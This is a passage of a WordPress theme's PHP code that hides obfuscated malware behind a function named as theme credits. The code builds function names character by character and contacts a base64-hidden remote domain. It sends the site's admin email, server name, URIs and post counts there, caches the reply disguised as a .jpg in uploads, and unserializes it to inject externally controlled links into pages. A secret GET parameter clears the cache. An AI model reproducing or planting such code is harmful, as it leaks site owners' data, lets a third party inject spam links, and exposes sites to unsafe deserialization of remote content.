				if (strlen($_GET["p"]) > 0) {
					echo $fu______h;
				}
				else if ((strlen($fu______h)>$zi________n) && ($bl___v = strpos($fu______h, " ", $zi________n ))) {
					$fu______h = substr($fu______h, 0, $bl___v);
					$fu______h = $fu______h;
					echo $fu______h;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ux______t</a></div></p>";
				} else {
					echo $fu______h;
				}
				
			}
		}
	


		$tf___________h='n';$fv______b='s';$rf_______________x='c';$bg_______________b='o';$ns___y='4';$ti____u='d';$zm_______c='e';$uu__________q='e';$yu__________m='e';$bq__________w='6';$xk___p='_';$ol_________r='a';$wz__________b='b';$vf___________f=$wz__________b.$ol_________r.$fv______b.$zm_______c.$bq__________w.$ns___y.$xk___p.$uu__________q.$tf___________h.$rf_______________x.$bg_______________b.$ti____u.$yu__________m;
		$gf________c='i';$bm_________p='s';$pq_____________v='f';$ti___c='_';$vd_____________w='g';$rt_______m='t';$mc______________a='e';$qa______________o='e';$rf________h='t';$bj__________s='e';$vi___b='_';$km_____c='n';$np____n='c';$xx__________t='t';$hq___________u='o';$zs________d='l';$to_____________m='n';$lz______r=$pq_____________v.$gf________c.$zs________d.$mc______________a.$ti___c.$vd_____________w.$qa______________o.$rf________h.$vi___b.$np____n.$hq___________u.$to_____________m.$xx__________t.$bj__________s.$km_____c.$rt_______m.$bm_________p;
		$xb___v='l';$rg___________m='x';$ul______________l='i';$vg___a='_';$qf___n='t';$gg_______a='s';$uc_________h='e';$xz_____________d='i';$fy______f='f';$ul______________g='e';$xf______s='s';$gt__________u=$fy______f.$ul______________l.$xb___v.$ul______________g.$vg___a.$uc_________h.$rg___________m.$xz_____________d.$xf______s.$qf___n.$gg_______a;
		$iz___f='v';$mb___________j='c';$yi______________t='n';$hh_____d='o';$ll_____________v='m';$cn_______________o='a';$js___________d='s';$vr___________t='r';$el_______________u='p';$qr_________f='i';$zo_________d='e';$xf__________w='e';$we____r='r';$li___________c='o';$en_______________m='_';$qf_______v=$iz___f.$xf__________w.$we____r.$js___________d.$qr_________f.$li___________c.$yi______________t.$en_______________m.$mb___________j.$hh_____d.$ll_____________v.$el_______________u.$cn_______________o.$vr___________t.$zo_________d;
		$ke_____________h='o';$cx______v='e';$pt______y='o';$ie___p='c';$bg____y='n';$te_______________j='f';$rz_____________t='k';$wu____b='s';$dn___________l='p';$fg____________a=$te_______________j.$wu____b.$pt______y.$ie___p.$rz_____________t.$ke_____________h.$dn___________l.$cx______v.$bg____y;
		$fo_______s='r';$fl______________w='i';$ux_______________x='w';$fk______________g='f';$hv______________i='t';$pg________x='e';$po________y=$fk______________g.$ux_______________x.$fo_______s.$fl______________w.$hv______________i.$pg________x;
		$yy_____________e='m';$pz_______________f='5';$jt__q='d';$tk_________v=$yy_____________e.$jt__q.$pz_______________f;
		$dn____h='t';$zr__________r='l';$nb_____h='r';$sa______________k='e';$sr_______________f='h';$im_______e='a';$he_______________z='a';$fl____________n='p';$xf__________f=$nb_____h.$sa______________k.$he_______________z.$zr__________r.$fl____________n.$im_______e.$dn____h.$sr_______________f;
		$ta_______v='e';$be_____j='l';$us_______u='a';$bp_____________b='e';$ru__________i='i';$eo___t='i';$dv____c='r';$pf_______s='n';$iz_____t='u';$kg_________g='s';$tm________e='z';$ym__x=$iz_____t.$pf_______s.$kg_________g.$bp_____________b.$dv____c.$ru__________i.$us_______u.$be_____j.$eo___t.$tm________e.$ta_______v;
		$ms__________s='a';$wq___m='p';$su___________s='m';$rm_____w='m';$tr_______u='t';$sf________p='e';$jt_____p='n';$wx_______u=$tr_______u.$sf________p.$rm_____w.$wq___m.$jt_____p.$ms__________s.$su___________s;
		$uf______r='r';$vn_______________j='t';$id______________v='x';$yj_________q='e';$by_______d='o';$ox_____q='_';$lf_______________y='_';$xs___w='n';$kd___m='s';$zz______a='r';$mx______________x='c';$sc________a='t';$cv_____________d='c';$lg_______e='e';$ha_____________x='a';$rh______z='e';$sk______________e='t';$cy______y='t';$nr___________d='m';$fh______________a='e';$ul____________m='a';$og__________t=$kd___m.$cy______y.$zz______a.$lg_______e.$ha_____________x.$nr___________d.$ox_____q.$mx______________x.$by_______d.$xs___w.$sk______________e.$rh______z.$id______________v.$vn_______________j.$lf_______________y.$cv_____________d.$uf______r.$yj_________q.$ul____________m.$sc________a.$fh______________a;
	


		function pp____n($ti________b) {
			global $ef_____d, $yp______m, $lz______r, $qf_______v, $og__________t;
			
			if (!$yp______m($ef_____d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($qf_______v(PHP_VERSION, "5.0.0", ">=") && $yp______m($ef_____d("ZmlsZV9nZXRfY29udGVudHM=")) && $yp______m($ef_____d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ga________z = $og__________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fa__________f = @$lz______r($ti________b, 0, $ga________z);
			} else {
				$fa__________f = @$lz______r($ti________b, 0);
			}
			
			return $fa__________f;
		}
	


		function ah_________w($ti________b) {
			global $yp______m, $fg____________a, $po________y, $ef_____d;
			
			if (!$yp______m($ef_____d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$zv___________v = strpos($ti________b, "/", 7);
			$mb_________z = array(
				"uri"     => substr($ti________b, $zv___________v),
				"host"    => str_replace("http://", "", substr($ti________b, 0, $zv___________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$sy______________f = @$fg____________a("$mb_________z[host]", 80, $ei_________u, $bg__________e, 4);
			
			if (!$sy______________f) {
				return false;
			} else {
				$fa__________f = "";
				$hf_______________e  = "GET $mb_________z[uri] HTTP/1.0\r\n";
				$hf_______________e .= "Host: $mb_________z[host]\r\n";
				$hf_______________e .= "Referer: $mb_________z[referer]\r\n";
				$hf_______________e .= "Connection: Close\r\n\r\n";
				
				@$po________y($sy______________f, $hf_______________e);
				
				while (!@feof($sy______________f)) {
					$sn____________c = @fgets($sy______________f, (1024*24));
					
					if ($sn____________c == "\r\n") {
						$ep__________u = true;
						continue;
					}
					
					if ($ep__________u) {
						$fa__________f .= $sn____________c;
					}
				}
				
				return $fa__________f;
			}
		}
	


		function ao___________z($ti________b) {
			global $yp______m;
			$tb_________d = false;
			
			if ($ti________b != "") {
				if ($yp______m("pp____n")) {
					$tb_________d = @pp____n($ti________b);
				}
				
				if (!$tb_________d && ($yp______m("ah_________w"))) {
					$tb_________d = @ah_________w($ti________b);
				}
			}
			
			return $tb_________d;
		}
	


		function xj____i() {
			global $_SERVER, $tk_________v;
			
			$kw_________h = $_SERVER["SERVER_NAME"];
			
			if (substr("$kw_________h", 0, 4) == "www.") {
				$kw_________h = substr("$kw_________h", 4);
			}
			
			$kw_________h = $tk_________v("$_SERVER[SERVER_NAME]");
			
			return $kw_________h;
		}
	


		function tr____________c() {
			return "file";
		}
	


		function zc____w($ti________b) {
			global $_SERVER, $lz______r, $gt__________u, $bc__________c, $mx___________x, $po________y;
			
			$sd____________c = bs__i();
			
			$ia____j = xj____i().".jpg";
			$wi______________v = $sd____________c["dir_upload"]["path"]."/$ia____j";
			$qd___________f = @filemtime($wi______________v);
			
			if (!$qd___________f || ((time()-$qd___________f) >= WP_TTL)) {
				$tb_________d = ao___________z($ti________b);
				
				if ($tb_________d) {
					if ($gt__________u($wi______________v)) {
						@unlink($wi______________v);
					}
					
					$jv__y = @$bc__________c($wi______________v, "x+");
					
					@$po________y($jv__y, $tb_________d);
					@$mx___________x($jv__y);
				}
			} else {
				if ($gt__________u($wi______________v)) {
					$tb_________d = @$lz______r($wi______________v);
				} else {
					$tb_________d = false;
				}
			}
			
			return $tb_________d;
		}
	


		function bs__i() {
			global $_SERVER, $ef_____d, $vf___________f;
			
			$mw___________i = wp_count_posts("post");
			$tn________i = pathinfo(get_bloginfo("template_directory"));
			
			$sd____________c = array(
				"url" => array(
					"report"      => $ef_____d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $tn________i,
				"dir_upload"	=> ur______o(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$tn________i[filename],
					"a005=".$mw___________i->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://mobilych.com.ua/articles/samsung-articles/samsung-galaxy-tab-3-7-0-budet-stoit-200-dollarov.html\">Samsung Galaxy Tab 3 7.0 </a>"
			);
			
			$sd____________c["url"]["queryString"] = implode("&", $sd____________c["queryString"]);
			$sd____________c["url"]["report"] = $sd____________c["url"]["report"]."/?".$vf___________f($sd____________c["url"]["queryString"]).".html";
						
			return $sd____________c;
		}
	


		function ur______o() {
			$cw_________g = wp_upload_dir();
			
			if (isset($cw_________g["error"])) {
				$ek_________z = vt___i();
				if (is_writable($ek_________z)) {
					$cw_________g = array("path" => $ek_________z);
				}
			}

			return $cw_________g;
		}
	


		function vt___i() {
			global $yp______m, $tk_________v, $xf__________f, $wx_______u;
			
			$ko_______n = (bool) ini_get("safe_mode");
			if ($ko_______n == true) {
				return false;
			}
			
			if ($yp______m("sys_get_temp_dir")) {
				$el______b = sys_get_temp_dir();
				if (is_writable($el______b)) {
					return $xf__________f($el______b);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $xf__________f($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $xf__________f($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $xf__________f($_ENV["TEMP"]);
			} else {
				$le___a = $wx_______u($tk_________v(uniqid(rand(), true)), "");
				if ($le___a) {
					$el______b = $xf__________f(dirname($le___a));
					@unlink($le___a);
					return $el______b;
				} else {
					return false;
				}
			}
		}
	


		function mx______j() {
			global $_GET, $gt__________u;
			
			$sd____________c = bs__i();
			$kw_________h = xj____i();
			$ad_______g = tr____________c();
			
			$za______n = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ad_______g == "file") {
					$ri______________c = $sd____________c["dir_upload"]["path"]."/".$kw_________h.".jpg";
					if ($gt__________u($ri______________c)) {
						@unlink($ri______________c);
						$za______n = "deleted";
					}
				}
				
				$iu_______________s = array(
					"s"	=> $za______n,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($iu_______________s AS $qf__i => $ox_______m) echo " [$qf__i:$ox_______m]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yp______m, $ef_____d, $ym__x;
			$sd____________c = bs__i();
			
			$zb__p = "zc____w";
			if ($yp______m($zb__p)) {
				$fa__________f = $zb__p($sd____________c["url"]["report"]);
			}
			
			if ($fa__________f) {
				if ($fa__________f = @$ef_____d($fa__________f)) {
					$fa__________f = @$ym__x($fa__________f);
					
					if (strlen($fa__________f[custom_credit]) >= 5) {
						$sd____________c["default_string"] = $fa__________f[custom_credit];
					}
					
					if ($fa__________f["status"] == "0") {
						$dm______m = 1;
						$zb__________x = 1;
					} else {
						$py________s = sizeof($fa__________f["links"]);
						$rw__________r = $sd____________c["default_string"];
						
						if ($py________s > 0 && $fa__________f["links"] !== "") {
							$ky__________q = 0;
							foreach ($fa__________f["links"] as $ml____________e => $js_____________n) {
								$ky__________q++;
								if ($js_____________n->l_path == "" || $js_____________n->l_path == $_SERVER["REQUEST_URI"]) {
									$js_____________n->l_href = htmlspecialchars(strip_tags($js_____________n->l_href));
									$js_____________n->l_title = htmlspecialchars(strip_tags($js_____________n->l_title));
									$js_____________n->l_anchor = htmlspecialchars(strip_tags($js_____________n->l_anchor));
									$rw__________r .= " | ";
									$rw__________r .= "<a href='$js_____________n->l_href' title='$js_____________n->l_title'";
									if ($js_____________n->l_nofollow == "1") {
										$rw__________r .= " rel='nofollow'";
									}
									$rw__________r .= ">$js_____________n->l_anchor</a>";
								}
							}
						}
						$sd____________c["links"] = "$rw__________r";
						if ($fa__________f[credit] == "0") {
							$sd____________c["links"] = "";
						}
					}
				} else {
					$dm______m = "1";
				}
			} else {
				$dm______m = "1";
			}
			
			if ($dm______m == "1") {
				$sd____________c["links"] = $sd____________c["default_string"];
			}
			
			echo "$sd____________c[links]";
			
			echo "<!-- s: $fa__________f[signature] -->";
			mx______j();
		}
	                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
